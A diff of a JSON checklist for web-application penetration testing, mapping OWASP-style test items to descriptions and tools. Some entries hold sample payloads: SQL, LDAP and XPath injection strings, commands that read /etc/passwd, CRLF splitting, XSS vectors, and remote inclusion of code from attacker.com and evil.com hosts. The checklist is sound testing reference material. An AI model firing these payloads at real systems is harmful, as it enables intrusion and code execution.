  "title": "Testing for HTTP Verb Tampering",
448
540
  "caption": "OTG-INPVAL-003, WAHHM - Test Handling of Input",
449
- "description": "Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.",
450
- "tools": "netcat",
541
+ "description": "Forge non-standard HTTP requests to probe and circumvent URL-based authentication and authorization mechanisms.",
542
+ "tools": "Burp Suite, HTTPie, httpx, ZAP",
451
543
  "vrt_category": "server_security_misconfiguration"
452
544
  },
453
545
  {
454
546
  "key": "http_param_pollution",
455
547
  "title": "Testing for HTTP Parameter pollution",
456
548
  "caption": "OTG-INPVAL-004, WAHHM - Test Handling of Input",
457
- "description": "Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP",
458
- "tools": "ZAP, HPP Finder (Chrome Plugin)",
549
+ "description": "Identify bypasses in input validation and filtering mechanisms via HTTP Parameter Pollution (HPP) to inject malicious payloads through user-supplied data.",
550
+ "tools": "Arjun, Burp Suite (Param-miner), ZAP",
459
551
  "vrt_category": "server_side_injection"
460
552
  },
461
553
  {
462
554
  "key": "sql_injection",
463
555
  "title": "Testing for SQL Injection",
464
556
  "caption": "OTG-INPVAL-005, WAHHM - Test Handling of Input",
465
- "description": "Union, Boolean, Error based, Out-of-band, Time delay.",
466
- "tools": "Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)",
557
+ "description": "Identify and exploit SQL injection vulnerabilities (Union, Boolean, Error-based, Out-of-band, Time-delay) to achieve unauthorized database access and data manipulation.",
558
+ "tools": "Burp Proxy (SQLipy), SQLMap",
467
559
  "vrt_category": "server_side_injection"
468
560
  },
469
561
  {
470
562
  "key": "oracle",
471
- "title": "Oracle Testing",
563
+ "title": "Testing for Oracle",
472
564
  "caption": "",
473
- "description": "Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection",
474
- "tools": "Orascan, SQLInjector"
565
+ "description": "Discover PL/SQL web application endpoints, leverage PL/SQL packages for access, bypass exclusion mechanisms, and exploit SQL injection vulnerabilities.",
566
+ "tools": "SQLMap"
475
567
  },
476
568
  {
477
569
  "key": "mysql",
478
- "title": "MySQL Testing",
570
+ "title": "Testing for MySQL",
479
571
  "caption": "",
480
- "description": "Identify MySQL version, Single quote, Information_schema, Read/Write file.",
481
- "tools": "SQLMap, Mysqloit, Power Injector"
572
+ "description": "Identify target MySQL version and leverage single quote injection via information_schema to achieve arbitrary file read/write capabilities.",
573
+ "tools": "SQLMap"
482
574
  },
483
575
  {
484
576
  "key": "sql_server",
485
- "title": "SQL Server Testing",
577
+ "title": "Testing for SQL Server",
486
578
  "caption": "",
487
- "description": "Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)",
488
- "tools": "SQLMap, SQLninja, Power Injector"
579
+ "description": "Leverage comment operators, query separators, and stored procedures (like xp_cmdshell) to inject and execute arbitrary commands within the database.",
580
+ "tools": "SQLMap"
489
581
  },
490
582
  {
491
583
  "key": "postgre_sql",
@@ -496,47 +588,47 @@
496
588
  },
497
589
  {
498
590
  "key": "ms_access",
499
- "title": "MS Access Testing",
591
+ "title": "Testing for MS Access",
500
592
  "caption": "",
501
- "description": "Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.",
593
+ "description": "Exploit error-based SQL injection (via GROUP BY) to enumerate database columns and extract schema information using targeted fuzzing lists.",
502
594
  "tools": "SQLMap"
503
595
  },
504
596
  {
505
597
  "key": "nosql_injection",
506
598
  "title": "Testing for NoSQL injection",
507
599
  "caption": "",
508
- "description": "dentify NoSQL databases, Pass special characters (' \" \\ ; { } ), Attack with reserved variable name, operator.",
600
+ "description": "Identify NoSQL database vulnerabilities by injecting special characters (' \" \\ ; { } ) and reserved keywords to manipulate query logic and potentially gain unauthorized access.",
509
601
  "tools": "NoSQLMap"
510
602
  },
511
603
  {
512
604
  "key": "ldap_injection",
513
605
  "title": "Testing for LDAP Injection",
514
606
  "caption": "OTG-INPVAL-006, WAHHM - Test Handling of Input",
515
- "description": "/ldapsearch?user=*user=*user=*)(uid=*))(|(uid=*pass=password",
516
- "tools": "Burp Proxy, ZAP",
607
+ "description": "Actively examining LDAP endpoints using specialized inputs to detect exploitable injection flaws that could lead to unauthorized data exposure or manipulation.",
608
+ "tools": "Burp Suite, ZAP",
517
609
  "vrt_category": "server_side_injection"
518
610
  },
519
611
  {
520
612
  "key": "orm_injection",
521
613
  "title": "Testing for ORM Injection",
522
614
  "caption": "OTG-INPVAL-007, WAHHM - Test Handling of Input",
523
- "description": "Testing ORM injection is identical to SQL injection testing",
524
- "tools": "Hibernate, Nhibernate",
615
+ "description": "Analyze application data flow to detect injection points where crafted input can alter ORM-generated queries, enabling unintended database interactions.",
616
+ "tools": "SQLMap",
525
617
  "vrt_category": "server_side_injection"
526
618
  },
527
619
  {
528
620
  "key": "xml_injection",
529
621
  "title": "Testing for XML Injection",
530
622
  "caption": "OTG-INPVAL-008, WAHHM - Test Handling of Input",
531
- "description": "Check with XML Meta Characters', \" , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG",
532
- "tools": "Burp Proxy, ZAP, Wfuzz",
623
+ "description": "Analyze XML parsing mechanisms for vulnerabilities where maliciously structured XML input can be injected to manipulate application logic or extract sensitive data.",
624
+ "tools": "Burp Suite, oxml_xxe, XXEinjector, ZAP",
533
625
  "vrt_category": "server_side_injection"
534
626
  },
535
627
  {
536
628
  "key": "ssi_injection",
537
629
  "title": "Testing for SSI Injection",
538
630
  "caption": "OTG-INPVAL-009, WAHHM - Test Handling of Input",
539
- "description": "Presence of .shtml extension, Check for these characters, < ! # = / . \" - > and [a-zA-Z0-9], include String = <!--#include virtual='/etc/passwd'",
631
+ "description": "Examine .shtml resources for server-side include processing flaws that allow the injection of control characters and directives to achieve arbitrary code execution or sensitive file access on the server.",
540
632
  "tools": "Burp Proxy, ZAP",
541
633
  "vrt_category": "server_side_injection"
542
634
  },
@@ -544,46 +636,46 @@
544
636
  "key": "xpath_injection",
545
637
  "title": "Testing for XPath Injection",
546
638
  "caption": "OTG-INPVAL-010, WAHHM - Test Handling of Input",
547
- "description": "Check for XML error enumeration by supplying a single quote (').\nUsername: or 1=1\nPassword: or ‘1’ = ‘1",
548
- "tools": "Burp Proxy, ZAP",
639
+ "description": "Analyze XML path processing for vulnerabilities where crafted input, such as single quotes and logical OR conditions (e.g., ' or '1'='1), can be injected to induce errors revealing underlying structure or bypass authentication logic.",
640
+ "tools": "Burp Suite, ReadyAPI, ZAP",
549
641
  "vrt_category": "server_side_injection"
550
642
  },
551
643
  {
552
644
  "key": "imap_smtp_injection",
553
- "title": "IMAP/SMTP Injection",
645
+ "title": "Testing for IMAP/SMTP Injection",
554
646
  "caption": "OTG-INPVAL-011, WAHHM - Test Handling of Input",
555
- "description": "Identifying vulnerable parameters with special characters (i.e.: \\, ‘, “, @, #, !, |).\nUnderstanding the data flow and deployment structure of the client\nIMAP/SMTP command injection (Header, Body, Footer)",
556
- "tools": "Burp Proxy, ZAP",
647
+ "description": "Analyze mail client data handling for vulnerabilities where crafted input with special characters can be injected into IMAP/SMTP commands (headers, body, footer), potentially leading to unintended mail server actions or information disclosure.",
648
+ "tools": "Burp Suite, netcat, nmap IMAP/SMTP NSE script, ZAP",
557
649
  "vrt_category": "server_side_injection"
558
650
  },
559
651
  {
560
652
  "key": "code_injection",
561
653
  "title": "Testing for Code Injection",
562
654
  "caption": "OTG-INPVAL-012, WAHHM - Test Handling of Input",
563
- "description": "Enter OS commands in the input field.?arg=1; system('id')",
564
- "tools": "Burp Proxy, ZAP, Liffy, Panoptic",
655
+ "description": "Analyze input fields for vulnerabilities where the injection of OS commands (e.g., ; system('id')) can lead to arbitrary command execution on the underlying system.",
656
+ "tools": "Arjun, Burp Suite (Param-miner), Liffy, ZAP",
565
657
  "vrt_category": "server_side_injection"
566
658
  },
567
659
  {
568
660
  "key": "local_file_inclusion",
569
661
  "title": "Testing for Local File Inclusion",
570
662
  "caption": "",
571
- "description": "LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)",
572
- "tools": "Burp Proxy, fimap, Liffy"
663
+ "description": "Analyze application file handling for vulnerabilities where manipulated input with dot-dot-slash sequences (../../) or PHP wrappers (php://filter) can be used to access sensitive local files.",
664
+ "tools": "Arjun, Burp Suite (Param-miner), Liffy, ZAP"
573
665
  },
574
666
  {
575
667
  "key": "remote_file_inclusion",
576
668
  "title": "Testing for Remote File Inclusion",
577
669
  "caption": "",
578
- "description": "RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page",
579
- "tools": "Burp Proxy, fimap, Liffy"
670
+ "description": "Analyze web applications for vulnerabilities where external URLs provided as parameters (e.g., ?file=http://attacker.com/malicious_page) can be included and executed by the server, leading to arbitrary code execution or data compromise.",
671
+ "tools": "Arjun, Burp Suite (Param-miner), Liffy, ZAP"
580
672
  },
581
673
  {
582
674
  "key": "command_injection",
583
675
  "title": "Testing for Command Injection",
584
676
  "caption": "OTG-INPVAL-013, WAHHM - Test Handling of Input",
585
- "description": "Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.\n%3Bcat%20/etc/passwd\ntest.pdf+|+Dir C:\\ ",
586
- "tools": "Burp Proxy, ZAP, Commix",
677
+ "description": "Analyze application input handling to identify vulnerabilities where crafted payloads leveraging OS-specific syntax (e.g., ``;,|+`) can be injected to execute arbitrary operating system commands on the underlying server.",
678
+ "tools": "Burp Suite, ZAP",
587
679
  "vrt_category": "server_side_injection"
588
680
  },
589
681
  {
@@ -591,45 +683,93 @@
591
683
  "title": "Testing for Buffer overflow",
592
684
  "caption": "OTG-INPVAL-014, WAHHM - Test Handling of Input",
593
685
  "description": "Testing for heap overflow vulnerability\nTesting for stack overflow vulnerability\nTesting for format string vulnerability",
594
- "tools": "Immunity Canvas, Spike, MSF, Nessus",
686
+ "tools": "Burp Suite, Radamsa, wfuzz, ZAP",
595
687
  "vrt_category": "server_side_injection"
596
688
  },
597
689
  {
598
690
  "key": "heap_overflow",
599
691
  "title": "Testing for Heap overflow",
600
692
  "caption": "",
601
- "description": "",
602
- "tools": ""
693
+ "description": "Examining dynamic memory allocation to detect if writing beyond allocated heap buffers can corrupt data structures, potentially enabling arbitrary code execution.",
694
+ "tools": "Burp Suite, Radamsa, wfuzz, ZAP"
603
695
  },
604
696
  {
605
697
  "key": "stack_overflow",
606
698
  "title": "Testing for Stack overflow",
607
699
  "caption": "",
608
- "description": "",
609
- "tools": ""
700
+ "description": "Investigating function call mechanisms to find if excessive data written to the stack can overwrite return addresses or local variables, potentially leading to control-flow redirection.",
701
+ "tools": "Burp Suite, Radamsa, wfuzz, ZAP"
610
702
  },
611
703
  {
612
704
  "key": "format_string",
613
705
  "title": "Testing for Format string",
614
706
  "caption": "",
615
- "description": "",
616
- "tools": ""
707
+ "description": "Probing input handling with format specifiers to determine if attacker-controlled strings can be used to read from or write to arbitrary memory locations.",
708
+ "tools": "Burp Suite, Radamsa, wfuzz, ZAP"
617
709
  },
618
710
  {
619
711
  "key": "incubated_vulnerabilities",
620
- "title": "Testing for incubated vulnerabilities",
712
+ "title": "Testing for Incubated Vulnerabilities",
621
713
  "caption": "OTG-INPVAL-015, WAHHM - Test Handling of Input",
622
- "description": "File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)",
623
- "tools": "Burp Proxy, BeEF, MSF",
714
+ "description": "Analyze application components (file upload, data handling, server configurations) for latent vulnerabilities like Stored XSS and SQL/XPath Injection, and identifying misconfigurations that could be exploited over time.",
715
+ "tools": "Burp Suite, ZAP",
624
716
  "vrt_category": "server_security_misconfiguration"
625
717
  },
626
718
  {
627
- "key": "http_splitting_and_smuggling",
628
- "title": "Testing for HTTP Splitting/Smuggling",
719
+ "key": "http_response_splitting",
720
+ "title": "Testing for HTTP Response Splitting",
721
+ "caption": "OTG-INPVAL-016, WAHHM - Test Handling of Input",
722
+ "description": "Analyze HTTP header handling for vulnerabilities allowing the injection of CRLF sequences (%0d%0a) to manipulate server responses and potentially conduct cross-user attacks.",
723
+ "tools": "Burp Suite, netcat, ZAP",
724
+ "vrt_category": "server_side_injection"
725
+ },
726
+ {
727
+ "key": "http_request_smuggling",
728
+ "title": "Testing for HTTP Request Smuggling",
629
729
  "caption": "OTG-INPVAL-016, WAHHM - Test Handling of Input",
630
- "description": "param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>",
631
- "tools": "Burp Proxy, ZAP, netcat",
730
+ "description": "Analyze backend HTTP processing for discrepancies in request parsing that allow the injection and misrouting of subsequent requests.",
731
+ "tools": "Burp Suite, netcat, ZAP",
632
732
  "vrt_category": "server_side_injection"
733
+ },
734
+ {
735
+ "key": "host_header_injection",
736
+ "title": "Testing for Host Header Injection",
737
+ "caption": "OTG-INPVAL-017",
738
+ "description": "Analyze application handling of the Host header for vulnerabilities allowing manipulation to conduct actions like cache poisoning or redirect users to malicious sites.",
739
+ "tools": "Burp Suite, curl, ZAP",
740
+ "vrt_category": "server_security_misconfiguration"
741
+ },
742
+ {
743
+ "key": "server_side_template_injection",
744
+ "title": "Testing for Server-side Template Injection",
745
+ "caption": "OTG-INPVAL-018",
746
+ "description": "Analyze server-side template rendering for vulnerabilities allowing injection of malicious code within template syntax to achieve remote code execution or data exfiltration.",
747
+ "tools": "Burp Suite, ZAP",
748
+ "vrt_category": "server_security_misconfiguration"
749
+ },
750
+ {
751
+ "key": "server_side_request_forgery",
752
+ "title": "Testing for Server-Side Request Forgery",
753
+ "caption": "OTG-INPVAL-019",
754
+ "description": "Probe application functionality that handles external URLs to identify vulnerabilities allowing unauthorized server-initiated requests.",
755
+ "tools": "Burp Suite, interactsh, SSRFmap",
756
+ "vrt_category": "server_security_misconfiguration"
757
+ },
758
+ {
759
+ "key": "insecure_deserialization",
760
+ "title": "Testing for Insecure Deserialization",
761
+ "caption": "",
762
+ "description": "Analyze application endpoints that deserialize data for vulnerabilities allowing manipulation of serialized objects to achieve arbitrary code execution or other malicious outcomes.",
763
+ "tools": "Burp Suite, ysoserial, ZAP",
764
+ "vrt_category": "server_security_misconfiguration"
765
+ },
766
+ {
767
+ "key": "testing_for_graphql",
768
+ "title": "Testing for GraphQL",
769
+ "caption": "",
770
+ "description": "Assess GraphQL implementations for vulnerabilities related to introspection, denial-of-service via complex queries, and insecure field access.",
771
+ "tools": "Burp Suite (GraphQL Raider), graphql-cop, GraphQLmap, InQL",
772
+ "vrt_category": "server_security_misconfiguration"
633
773
  }
634
774
  ]
635
775
  },
@@ -643,16 +783,24 @@
643
783
  "key": "error_codes",
644
784
  "title": "Analysis of Error Codes",
645
785
  "caption": "OTG-ERR-001, WAHHM - Recon and Analysis",
646
- "description": "Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)",
647
- "tools": "Burp Proxy, ZAP",
786
+ "description": "Examine error messages and handling mechanisms for disclosure of sensitive data, internal system details, or potential for denial-of-service.",
787
+ "tools": "Burp Suite, ZAP",
648
788
  "vrt_category": "server_security_misconfiguration"
649
789
  },
650
790
  {
651
791
  "key": "stack_traces",
652
792
  "title": "Analysis of Stack Traces",
653
793
  "caption": "OTG-ERR-002, WAHHM - Recon and Analysis",
654
- "description": "Invalid Input / Empty inputs. Input that contains non alphanumeric characters or query syntax. Access to internal pages without authentication. Bypassing application flow.",
655
- "tools": "Burp Proxy, ZAP",
794
+ "description": "Check application responses for exposed stack traces that could disclose sensitive internal information.",
795
+ "tools": "Burp Suite, ZAP",
796
+ "vrt_category": "server_security_misconfiguration"
797
+ },
798
+ {
799
+ "key": "forbidden_bypass",
800
+ "title": "Testing for 403 forbidden bypass",
801
+ "caption": "",
802
+ "description": "Test various techniques like HTTP verb manipulation, URL encoding, directory traversal, header manipulation, path fuzzing, case manipulation, adding a trailing slash, and attaching a URL fragment to bypass 403 Forbidden errors",
803
+ "tools": "Burp Suite (403-bypasser), ZAP, 403jump",
656
804
  "vrt_category": "server_security_misconfiguration"
657
805
  }
658
806
  ]
@@ -668,24 +816,32 @@
668
816
  "title": "Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection",
669
817
  "caption": "OTG-CRYPST-001, WAHHM - Test Handling of Access",
670
818
  "description": "Identify SSL service, Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)",
671
- "tools": "testssl.sh, SSL Breacher",
819
+ "tools": "testssl.sh, nmap --script ssl-enum-ciphers",
672
820
  "vrt_category": "server_security_misconfiguration"
673
821
  },
674
822
  {
675
823
  "key": "padding_oracle",
676
824
  "title": "Testing for Padding Oracle",
677
825
  "caption": "OTG-CRYPST-002, WAHHM - Test Handling of Access",
678
- "description": "Compare the responses in three different states:\nCipher text gets decrypted, resulting data is correct.\nCipher text gets decrypted, resulting data is garbled and causes some exception or error handling in the application logic.\nCipher text decryption fails due to padding errors.",
679
- "tools": "PadBuster, Poracle, python-paddingoracle, POET",
826
+ "description": "Evaluate application behavior across three ciphertext states: valid decryption, decryption resulting in errors (non-padding), and padding-related decryption failures.",
827
+ "tools": "Burp Suite (Padding Oracle Hunter), PadBuster, python-paddingoracle, POET",
680
828
  "vrt_category": "broken_authentication_and_session_management"
681
829
  },
682
830
  {
683
831
  "key": "unencrypted_channels",
684
832
  "title": "Testing for Sensitive information sent via unencrypted channels",
685
833
  "caption": "OTG-CRYPST-003, WAHHM - Test Handling of Access",
686
- "description": "Check sensitive data during the transmission:\nInformation used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies…)\nInformation protected by laws, regulations or specific organizational policy (e.g. Credit Cards, Customers data)",
687
- "tools": "Burp Proxy, ZAP, Curl",
834
+ "description": "Ensure encrypted transport for sensitive information: authentication secrets, session tokens, and protected data (e.g., PCI, customer records)",
835
+ "tools": "Burp Suite, curl, ZAP",
688
836
  "vrt_category": "broken_authentication_and_session_management"
837
+ },
838
+ {
839
+ "key": "weak_encryption",
840
+ "title": "Testing for Weak Encryption",
841
+ "caption": "OTG-CRYPST-004, WAHHM - Test Handling of Access",
842
+ "description": "Identify weak encryption algorithms (e.g., MD5, SHA-1) in storage or transit.",
843
+ "tools": "DevTools, Burp Suite, ZAP",
844
+ "vrt_category": "cryptographic_weakness"
689
845
  }
690
846
  ]
691
847
  },
@@ -699,70 +855,94 @@
699
855
  "key": "data_validation",
700
856
  "title": "Test Business Logic Data Validation",
701
857
  "caption": "OTG-BUSLOGIC-001, WAHHM - Test for Logic Flaws",
702
- "description": "Looking for data entry points or hand off points between systems or software.\nOnce found try to insert logically invalid data into the application/system.",
703
- "tools": "Burp Proxy, ZAP",
858
+ "description": "Evaluate business logic for proper data validation implementation, covering range checks, format validation, consistency checks, and adherence to business rules.",
859
+ "tools": "Burp Suite, ZAP",
704
860
  "vrt_category": "broken_access_control"
705
861
  },
706
862
  {
707
863
  "key": "forge_requests",
708
864
  "title": "Test Ability to Forge Requests",
709
865
  "caption": "OTG-BUSLOGIC-002, WAHHM - Test for Logic Flaws",
710
- "description": "Looking for guessable, predictable or hidden functionality of fields.\nOnce found, try to insert logically valid data into the application/system allowing the user to go through the application/system against the normal business logic workflow.",
711
- "tools": "Burp Proxy, ZAP",
866
+ "description": "Test the ability to forge HTTP requests to assess potential vulnerabilities related to request manipulation and unauthorized actions.",
867
+ "tools": "Burp Suite, ZAP",
712
868
  "vrt_category": "server_side_injection"
713
869
  },
714
870
  {
715
871
  "key": "integrity_check",
716
872
  "title": "Test Integrity Checks",
717
873
  "caption": "OTG-BUSLOGIC-003, WAHHM - Test for Logic Flaws",
718
- "description": "Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.\nFor each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.\nAttempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the business logic workflow.",
719
- "tools": "Burp Proxy, ZAP",
874
+ "description": "Validate data integrity across application components (inputs, databases, logs) by verifying expected data types, formats, and authorized modifications based on business logic. Attempt to inject invalid data and unauthorized operations.",
875
+ "tools": "Burp Suite, ZAP",
720
876
  "vrt_category": "broken_access_control"
721
877
  },
722
878
  {
723
879
  "key": "process_timing",
724
880
  "title": "Test for Process Timing",
725
881
  "caption": "OTG-BUSLOGIC-004, WAHHM - Test for Logic Flaws",
726
- "description": "Looking for application/system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time.\nDevelop and execute the mis-use cases ensuring that attackers cannot gain an advantage based on any timing.",
727
- "tools": "Burp Proxy, ZAP",
882
+ "description": "Exploit race conditions via timing attacks.",
883
+ "tools": "Burp Suite (Turbo Intruder), ZAP",
728
884
  "vrt_category": "server_side_injection"
729
885
  },
730
886
  {
731
887
  "key": "usage_limits",
732
888
  "title": "Test Number of Times a Function Can be Used Limits",
733
889
  "caption": "OTG-BUSLOGIC-005, WAHHM - Test for Logic Flaws",
734
- "description": "Looking for functions or features in the application or system that should not be executed more than a single time or specified number of times during the business logic workflow.\nFor each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.",
735
- "tools": "Burp Proxy, ZAP",
890
+ "description": "Attempt to exceed defined rate limits on critical endpoints to verify proper implementation and resilience.",
891
+ "tools": "Burp Suite, ZAP",
736
892
  "vrt_category": "broken_access_control"
737
893
  },
738
894
  {
739
895
  "key": "workflow_circumvention",
740
896
  "title": "Testing for the Circumvention of Work Flows",
741
897
  "caption": "OTG-BUSLOGIC-006, WAHHM - Test for Logic Flaws",
742
- "description": "Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.\nFor each method develop a misuse case and try to circumvent or perform an action that is 'not acceptable' per the business logic workflow.",
743
- "tools": "Burp Proxy, ZAP",
898
+ "description": "Skip workflow steps (e.g., payment) for unauthorized access.",
899
+ "tools": "Burp Suite, ZAP",
744
900
  "vrt_category": "broken_access_control"
745
901
  },
746
902
  {
747
903
  "key": "application_misuse",
748
904
  "title": "Test Defenses Against Application Mis-use",
749
905
  "caption": "OTG-BUSLOGIC-007, WAHHM - Test for Logic Flaws",
750
- "description": "Measures that might indicate the application has in-built self-defense:\nChanged responses, Blocked requests, Actions that log a user out or lock their account",
751
- "tools": "Burp Proxy, ZAP"
906
+ "description": "Test for vulnerabilities allowing abuse of application functionality (e.g., excessive resource consumption, unintended workflows).",
907
+ "tools": "Burp Suite, ZAP"
752
908
  },
753
909
  {
754
910
  "key": "upload_unexpected_files",
755
911
  "title": "Test Upload of Unexpected File Types",
756
912
  "caption": "OTG-BUSLOGIC-008, WAHHM - Test for Logic Flaws",
757
- "description": "Review the project documentation and perform some exploratory testing looking for file types that should be 'unsupported' by the application/system.\nTry to upload these “unsupported” files and verify that they are properly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. PS. file.phtml, shell.phPWND, SHELL~1.PHP",
758
- "tools": "Burp Proxy, ZAP"
913
+ "description": "Test Upload of Unexpected File Types to assess the application's handling of non-standard file uploads and prevent potential security risks like remote code execution.",
914
+ "tools": "Burp Suite, curl, ZAP"
759
915
  },
760
916
  {
761
917
  "key": "malicious_files",
762
918
  "title": "Test Upload of Malicious Files",
763
919
  "caption": "OTG-BUSLOGIC-009, WAHHM - Test for Logic Flaws",
764
- "description": " Develop or acquire a known “malicious” file.\nTry to upload the malicious file to the application/system and verify that it is correctly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.",
765
- "tools": "Burp Proxy, ZAP",
920
+ "description": "Test Upload of Malicious Files to Assess Potential for Remote Code Execution, Data Exposure, or System Compromise.",
921
+ "tools": "Burp Suite, curl, ZAP",
922
+ "vrt_category": "server_security_misconfiguration"
923
+ },
924
+ {
925
+ "key": "exif_metadata",
926
+ "title": "Testing for Stripped EXIF Geolocation Metadata in Uploaded Images",
927
+ "caption": "",
928
+ "description": "Check uploaded images for unstripped EXIF metadata leaking sensitive data.",
929
+ "tools": "exiftool",
930
+ "vrt_category": "server_security_misconfiguration"
931
+ },
932
+ {
933
+ "key": "csv_injection",
934
+ "title": "Testing for CSV Injection",
935
+ "caption": "",
936
+ "description": "Check for formula injection vulnerabilities in CSV export functionality.",
937
+ "tools": "Burp Suite, ZAP",
938
+ "vrt_category": "server_security_misconfiguration"
939
+ },
940
+ {
941
+ "key": "password_requirement",
942
+ "title": "Testing for Lack of Password Confirmation",
943
+ "caption": "",
944
+ "description": "Verify absence of password confirmation prompts for sensitive actions: Account deletion, email change, password change, and 2FA management.",
945
+ "tools": "Browser, Burp Suite, ZAP",
766
946
  "vrt_category": "server_security_misconfiguration"
767
947
  }
768
948
  ]
@@ -775,97 +955,109 @@
775
955
  "items": [
776
956
  {
777
957
  "key": "dom_based_xss",
778
- "title": "Testing for DOM based Cross Site Scripting",
958
+ "title": "Testing for DOM-based Cross-Site Scripting",
779
959
  "caption": "OTG-CLIENT-001, WAHHM - Miscellaneous Tests",
780
- "description": "Test for the user inputs obtained from client-side JavaScript Objects",
781
- "tools": "Burp Proxy, DOMinator",
960
+ "description": "Analyze client-side JavaScript for vulnerabilities where attacker-controlled data in the DOM can be manipulated to execute malicious scripts.",
961
+ "tools": "Browser, Burp Suite, DOMinator, ZAP",
782
962
  "vrt_category": "cross_site_scripting_xss"
783
963
  },
784
964
  {
785
965
  "key": "javascript_execution",
786
966
  "title": "Testing for JavaScript Execution",
787
967
  "caption": "OTG-CLIENT-002, WAHHM - Test Handling of Input",
788
- "description": "Inject JavaScript code:\nwww.victim.com/?javascript:alert(1)",
789
- "tools": "Burp Proxy, ZAP",
968
+ "description": "Test for the ability to inject and execute malicious JavaScript.",
969
+ "tools": "Browser, Burp Suite, ZAP",
790
970
  "vrt_category": "cross_site_scripting_xss"
791
971
  },
792
972
  {
793
973
  "key": "html_injection",
794
974
  "title": "Testing for HTML Injection",
795
975
  "caption": "OTG-CLIENT-003, WAHHM - Test Handling of Input",
796
- "description": "Send malicious HTML code:\n?user=<img%20src='aaa'%20onerror=alert(1)>",
797
- "tools": "Burp Proxy, ZAP",
976
+ "description": "Check input fields and website areas for the ability to inject arbitrary HTML code.",
977
+ "tools": "Browser, Burp Suite, ZAP",
798
978
  "vrt_category": "server_side_injection"
799
979
  },
800
980
  {
801
981
  "key": "url_redirect",
802
- "title": "Testing for Client Side URL Redirect",
982
+ "title": "Testing for Client-Side URL Redirect",
803
983
  "caption": "OTG-CLIENT-004, WAHHM - Test Handling of Input",
804
- "description": "Modify untrusted URL input to a malicious site:\n(Open Redirect)?redirect=www.fake-target.site",
805
- "tools": "Burp Proxy, ZAP",
984
+ "description": "Analyze client-side code for manipulable redirect parameters that could lead to phishing or malicious site redirects.",
985
+ "tools": "Browser, Burp Suite, ZAP",
806
986
  "vrt_category": "unvalidated_redirects_and_forwards"
807
987
  },
808
988
  {
809
989
  "key": "css_injection",
810
990
  "title": "Testing for CSS Injection",
811
991
  "caption": "OTG-CLIENT-005, WAHHM - Test Handling of Input",
812
- "description": "nject code in the CSS context :\nwww.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])\nwww.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)",
813
- "tools": "Burp Proxy, ZAP",
992
+ "description": "Analyze CSS handling for vulnerabilities allowing injection of malicious styles to alter page rendering or extract sensitive information.",
993
+ "tools": "Browser, Burp Suite, ZAP",
814
994
  "vrt_category": "server_security_misconfiguration"
815
995
  },
816
996
  {
817
997
  "key": "resource_manipulation",
818
998
  "title": "Testing for Client Side Resource Manipulation",
819
999
  "caption": "OTG-CLIENT-006, WAHHM - Test Handling of Input",
820
- "description": "External JavaScript could be easily injected in the trusted web site\nwww.victim.com/#http://evil.com/js.js",
821
- "tools": "Burp Proxy, ZAP",
1000
+ "description": "Assess the application's resilience against attacks that involve manipulating client-side resources to achieve malicious outcomes.",
1001
+ "tools": "Browser, Burp Suite, ZAP",
822
1002
  "vrt_category": "server_security_misconfiguration"
823
1003
  },
824
1004
  {
825
1005
  "key": "cors",
826
- "title": "Test Cross Origin Resource Sharing",
1006
+ "title": "Testing Cross-Origin Resource Sharing",
827
1007
  "caption": "OTG-CLIENT-007, WAHHM - Miscellaneous Tests",
828
- "description": "Check the HTTP headers in order to understand how CORS is used (Origin Header)",
829
- "tools": "Burp Proxy, ZAP",
830
- "vrt_category": "server_security_misconfiguration"
831
- },
832
- {
833
- "key": "cross_site_flashing",
834
- "title": "Testing for Cross Site Flashing",
835
- "caption": "OTG-CLIENT-008, WAHHM - Test Handling of Input",
836
- "description": "Decompile, Undefined variables, Unsafe methods, Include malicious SWF http://victim/file.swf?lang=http://evil",
837
- "tools": "FlashBang, Flare, Flasm, SWFScan, SWF Intruder",
1008
+ "description": "Verify proper CORS configuration to prevent unauthorized cross-domain data access.",
1009
+ "tools": "Browser, Burp Suite, ZAP",
838
1010
  "vrt_category": "server_security_misconfiguration"
839
1011
  },
840
1012
  {
841
1013
  "key": "clickjacking",
842
1014
  "title": "Testing for Clickjacking",
843
1015
  "caption": "OTG-CLIENT-009, WAHHM - Miscellaneous Tests",
844
- "description": "Discover if a website is vulnerable by loading into an iframe, create a simple web page that includes a frame containing the target.",
845
- "tools": "Burp Proxy",
1016
+ "description": "Determine if the website implements sufficient client-side defenses (e.g., X-Frame-Options, Content-Security-Policy) to prevent rendering within a frame controlled by a malicious site.",
1017
+ "tools": "Browser, Burp Suite, ZAP",
846
1018
  "vrt_category": "server_security_misconfiguration"
847
1019
  },
848
1020
  {
849
1021
